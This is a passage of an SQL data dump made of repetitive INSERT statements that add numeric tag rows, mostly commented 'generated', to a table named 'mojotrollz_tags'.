`table`, `type`, `value`, `comment`) VALUES (11154, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11155, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11156, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11156, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11176, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11176, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11176, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11176, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11176, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11176, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11177, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11177, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11177, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11177, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11177, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11178, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11178, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11178, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11178, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11178, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11180, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11180, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11181, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11181, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11182, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11182, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11183, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11183, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11184, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11184, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11185, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11185, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11186, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11186, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11187, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11187, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11188, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11189, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11189, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11190, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11191, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11191, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11192, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11192, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11193, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11193, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11194, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11194, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11195, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11196, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11196, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11197, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11198, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11198, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11199, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11200, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11216, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11216, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11217, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11217, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11218, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11219, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11219, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11236, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11256, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11257, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11257, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11258, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11258, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11259, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11259, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11260, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11260, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11261, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11261, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11262, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11263, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11276, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11278, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11278, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11279, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11280, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11281, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11282, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11283, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11284, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11285, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11286, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11286, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11287, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11288, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11288, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11289, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11289, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11290, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11290, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11291, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11291, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11296, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11317, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11317, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11318, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11318, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11318, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11319, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11319, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11319, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11320, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11320, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11320, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11321, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11321, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11321, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11322, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11322, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11322, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11323, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11323, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11323, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11324, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11324, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11324, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11325, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11326, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11327, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11328, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11328, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11338, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11338, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11338, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11339, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11339, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11339, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11340, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11340, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11340, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11346, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11346, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11347, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11347, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11347, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11348, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11348, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11348, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11350, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11350, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11350, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11351, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11351, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11351, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11352, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11352, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11352, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11353, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11353, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11353, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11355, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11355, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11356, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11356, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11356, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11357, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11357, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11357, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11359, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11359, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11359, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11360, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11360, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11360, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11361, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11361, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11361, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11365, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11365, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11365, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11368, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11368, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11368, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11370, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11370, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11370, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11371, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11371, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11371, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11372, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11372, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11372, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11373, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11373, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11373, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11374, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11374, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11374, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11378, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11378, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11378, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11380, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11380, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11380, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11382, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11382, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11382, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11383, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11383, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11387, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11387, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11387, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11388, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11388, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11388, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11389, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11389, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11389, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11390, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11390, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11390, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11391, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11391, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11391, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11397, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11401, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11401, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11406, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11406, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11407, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11407, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11437, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11438, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11438, 1, 